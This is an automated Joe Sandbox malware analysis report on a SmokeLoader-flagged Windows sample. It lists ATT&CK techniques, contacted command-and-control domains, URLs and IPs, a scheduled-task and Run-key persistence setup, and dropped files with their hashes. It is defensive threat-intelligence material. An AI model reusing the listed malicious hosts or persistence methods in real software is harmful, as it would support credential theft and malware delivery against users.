Source: Yara match	File source: C:\Users\user\AppData\LocalLow\machineinfo.txt, type: DROPPED

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1267461020.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1451110742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1428267644.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.y98WYYcJ2U.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.y98WYYcJ2U.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.y98WYYcJ2U.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cwfbibg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cwfbibg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.cwfbibg.1f0000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API2	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	OS Credential Dumping2	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer15	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	Application Shimming1	Application Shimming1	Obfuscated Files or Information4	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Windows Service1	Access Token Manipulation1	Software Packing22	Credentials In Files1	File and Directory Discovery3	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol5	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Registry Run Keys / Startup Folder1	Windows Service1	Timestomp1	NTDS	System Information Discovery47	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Application Layer Protocol26	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection512	DLL Side-Loading1	LSA Secrets	Security Software Discovery351	SSH	Input Capture1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Registry Run Keys / Startup Folder1	File Deletion1	Cached Domain Credentials	Virtualization/Sandbox Evasion22	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading11	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion22	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation1	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection512	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
y98WYYcJ2U.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
2831ujedkdajsdj.info	109.94.209.7	true	false	unknown
chinadevmonster.top	47.245.136.23	true	false	unknown
fqnvtmqsywublocpheas.eu	45.84.227.231	true	false	unknown
telete.in	195.201.225.248	true	false	unknown
fqnvtmqsywublocpheas.su	unknown	unknown	true	unknown
fqnvtmqsywublocpheas.ru	unknown	unknown	true	unknown
dkajsdjiqwdwnfj.info	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://2831ujedkdajsdj.info/	false	unknown
http://chinadevmonster.top/gate/libs.zip	false	unknown
http://chinadevmonster.top/gate/log.php	false	unknown
http://chinadevmonster.top/file_handler4/file.php?hash=29a48d36455677adfa3fd9866445462d19dfa596&js=c2192b8881e9e86fdae59338948668354bcd5e2d&callback=http://chinadevmonster.top/gate	false	unknown
http://chinadevmonster.top/gate/sqlite3.dll	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://chinadevmonster.top/gate/log.phpditional	3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	false	unknown
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	nssckbi.dll.4.dr	false	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	nssckbi.dll.4.dr	false	unknown
http://cert.int-x3.letsencrypt.org/0Y	3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	false	high
http://crl.chambersign.org/chambersroot.crl0	nssckbi.dll.4.dr	false	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
https://telete.in/jarkadiyvolniy	3BD3.exe, 00000004.00000002.1528044132.0000000000726000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	false	unknown
https://repository.luxtrust.lu0	nssckbi.dll.4.dr	false	unknown
http://cps.chambersign.org/cps/chambersroot.html0	nssckbi.dll.4.dr	false	unknown
http://www.mozilla.com0	AccessibleHandler.dll.4.dr	false	unknown
http://www.chambersign.org1	nssckbi.dll.4.dr	false	unknown
https://search.aol.com/favicon.icohttps://search.aol.com/aol/search?q=	3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	false	high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	nssckbi.dll.4.dr	false	unknown
http://www.firmaprofesional.com/cps0	nssckbi.dll.4.dr	false	high
http://www.tiro.com	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
http://www.diginotar.nl/cps/pkioverheid0	nssckbi.dll.4.dr	false	unknown
http://repository.swisssign.com/0	nssckbi.dll.4.dr	false	high
http://www.goodfont.co.kr	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
http://crl.securetrust.com/SGCA.crl0	nssckbi.dll.4.dr	false	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search?ei=	3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	false	high
http://crl.securetrust.com/STCA.crl0	nssckbi.dll.4.dr	false	unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	nssckbi.dll.4.dr	false	unknown
http://cps.root-x1.letm6	3BD3.exe, 00000004.00000002.1530773523.000000004B38A000.00000004.00000001.sdmp	false	unknown
http://www.sajatypeworks.com	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
http://www.typography.netD	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
http://fontfabrik.com	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
https://support.mozilla.org/en-US/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire	y2017hGX7.4.dr	false	high
http://crl.thawte.com/ThawteTimestampingCA.crl0	AccessibleHandler.dll.4.dr	false	high
http://www.certplus.com/CRL/class2.crl0	nssckbi.dll.4.dr	false	unknown
https://tenadevmonster.top/	3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	false	unknown
http://www.quovadisglobal.com/cps0	nssckbi.dll.4.dr	false	high
http://chinadevmonster.top/gate/sqlite3.dllnnel%	3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	false	unknown
http://chinadevmonster.top/gatea	3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp	false	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	nssckbi.dll.4.dr	false	high
http://www.%s.comPA	explorer.exe, 00000002.00000000.1293389954.00000000014B0000.00000002.00000001.sdmp	false	low
http://www.fonts.com	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	high
http://www.sandoll.co.kr	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
https://sp.ask.com/sh/i/a16/favicon/favicon.icohttps://www.ask.com/web?q=	3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	false	high
http://chinadevmonster.top/file_handler4/file.php?hash=29a48d36455677adfa3fd9866445462d19dfa596&js=c	3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	false	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
https://ocsp.quovadisoffshore.com0	nssckbi.dll.4.dr	false	unknown
http://cps.chambersign.org/cps/chambersignroot.html0	nssckbi.dll.4.dr	false	unknown
http://www.sqlite.org/copyright.html.	sqlite3.dll.4.dr	false	high
http://cps.root-x1.letsencrypt.org0	3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	false	unknown
http://policy.camerfirma.com0	nssckbi.dll.4.dr	false	unknown
http://chinadevmonster.top/gate	3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1531805660.000000004B415000.00000004.00000001.sdmp	false	unknown
http://ss.ask.com/query?q=	3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	false	high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.4.dr	false	high
https://telete.in/org/img/t_logo.png	3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	false	unknown
http://cps.letsencrypt.org0	3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	false	unknown
http://www.accv.es/legislacion_c.htm0U	nssckbi.dll.4.dr	false	high
http://www.certicamara.com/dpc/0Z	nssckbi.dll.4.dr	false	high
http://ocsp.accv.es0	nssckbi.dll.4.dr	false	unknown
http://ocsp.thawte.com0	AccessibleHandler.dll.4.dr	false	unknown
https://support.mozilla.org/en-US/products/firefoxgro.allizom.troppus.	y2017hGX7.4.dr	false	high
http://ocsp.int-x3.letsencrypt.org0/	3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	false	unknown
http://www.msn.com/?ocid=iehph	3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	false	high
http://chinadevmonster.top/gatel	3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp	false	unknown
http://www.carterandcone.coml	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
http://chinadevmonster.top/gate/log.phpn	3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	false	unknown
https://www.catcert.net/verarrel	nssckbi.dll.4.dr	false	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	nssckbi.dll.4.dr	false	high
http://chinadevmonster.top/	3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp	false	unknown
http://crl.chambersign.org/chambersignroot.crl0	nssckbi.dll.4.dr	false	unknown
http://crl.xrampsecurity.com/XGCA.crl0	nssckbi.dll.4.dr	false	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	false	unknown
https://autosuggest.search.aol.com/autocomplete/get?output=json&it=&q=	3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	false	high
https://www.catcert.net/verarrel05	nssckbi.dll.4.dr	false	unknown
http://www.quovadis.bm0	nssckbi.dll.4.dr	false	unknown
https://support.mozilla.org	y2017hGX7.4.dr	false	high
http://www.accv.es00	nssckbi.dll.4.dr	false	unknown
http://www.pkioverheid.nl/policies/root-policy-G20	nssckbi.dll.4.dr	false	unknown
http://www.cert.fnmt.es/dpcs/0	nssckbi.dll.4.dr	false	high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
109.94.209.7	Russian Federation	202376	ARVID-LOGICUMEE	false
47.245.136.23	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
195.201.225.248	Germany	24940	HETZNER-ASDE	false

General Information

Joe Sandbox Version:	29.0.0
Analysis ID:	56087
Start date:	13.09.2020
Start time:	20:52:55
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 21m 57s
Hypervisor based Inspection enabled:	true
Report type:	full
Sample file name:	y98WYYcJ2U.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10x64 HVM (IE 11.1, Chrome 67, Firefox 61, Adobe Reader 18, Java 8 Update 171)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@13/79@31/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 90% Number of executed functions: 26 Number of non-executed functions: 444
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): dllhost.exe Excluded IPs from analysis (whitelisted): 93.184.221.240, 8.250.141.254, 67.26.131.254, 8.253.93.248, 8.250.159.254, 8.238.85.126, 8.248.235.254, 8.252.5.126, 8.248.233.254, 8.241.126.249, 23.54.113.104 Excluded domains from analysis (whitelisted): fs.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:54:41	Task Scheduler	Run new task: NvNgxUpdateCheckDaily_{3D45A02F-A02F-A02F-A02F-3D45A02FA02F} path: C:\Users\user\AppData\Roaming\cwfbibg
20:54:48	API Interceptor	5x Sleep call for process: 3BD3.exe modified
20:56:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ahceehaw C:\Users\user\AppData\Roaming\Ogeq\tiik.exe
20:56:12	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ahceehaw C:\Users\user\AppData\Roaming\Ogeq\tiik.exe

Created / dropped Files

C:\Users\user\AppData\LocalLow\1xVPfvJcrg Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	SQLite 3.x database
Size (bytes):	73728
Entropy (8bit):	1.1412500775740033
Encrypted:	false
MD5:	DC53F6E7C539B32EED83E85CF34C978D
SHA1:	2DFACAE91E3A14A3DA296CD8D4B6793313388F3B
SHA-256:	ED8B543797D2AE62D63CA53416067A12BF6FBE9F498E5D021C3532ECDBF6039F
SHA-512:	65802DF952DD7ADD4851EDD3BBA225DC5FC5ED2609C1FB02CF49E7569F8C1ED546916E61EFE6EB14B959C86E28327D07467948E64714373EE342918C21D536AB
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ .......$........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\AccessibleHandler.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	123344
Entropy (8bit):	6.504957642040826
Encrypted:	false
MD5:	F92586E9CC1F12223B7EEB1A8CD4323C
SHA1:	F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
SHA-256:	A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
SHA-512:	5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\AccessibleMarshal.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	26064
Entropy (8bit):	5.981632010321345
Encrypted:	false
MD5:	A7FABF3DCE008915CEE4FFC338FA1CE6
SHA1:	F411FB41181C79FBA0516D5674D07444E98E7C92
SHA-256:	D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
SHA-512:	3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\IA2Marshal.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	70608
Entropy (8bit):	5.389701090881864
Encrypted:	false
MD5:	5243F66EF4595D9D8902069EED8777E2
SHA1:	1FB7F82CD5F1376C5378CD88F853727AB1CC439E
SHA-256:	621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
SHA-512:	A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&\|.J...K&\|.J...K&\|uK...K&\|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Yara Hits:	Rule: ConventionEngine_Keyword_Hook, Description: Searching for PE files with PDB path keywords, terms or anomalies., Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll, Author: @stvemillertime Rule: ConventionEngine_Keyword_Proxy, Description: Searching for PE files with PDB path keywords, terms or anomalies., Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll, Author: @stvemillertime
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Yara Hits:	Rule: ConventionEngine_Keyword_Hook, Description: Searching for PE files with PDB path keywords, terms or anomalies., Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll, Author: @stvemillertime Rule: ConventionEngine_Keyword_Proxy, Description: Searching for PE files with PDB path keywords, terms or anomalies., Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll, Author: @stvemillertime
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l1-2-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18232
Entropy (8bit):	7.112057846012794
Encrypted:	false
MD5:	E2F648AE40D234A3892E1455B4DBBE05
SHA1:	D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:	18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l2-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18232
Entropy (8bit):	7.166618249693435
Encrypted:	false
MD5:	E479444BDD4AE4577FD32314A68F5D28
SHA1:	77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:	2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..\|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..\|........8...T...T.......4..\|........d...............4..\|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..\|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-handle-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18232
Entropy (8bit):	7.1117101479630005
Encrypted:	false
MD5:	6DB54065B33861967B491DD1C8FD8595
SHA1:	ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:	AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:	false
Reputation:	low
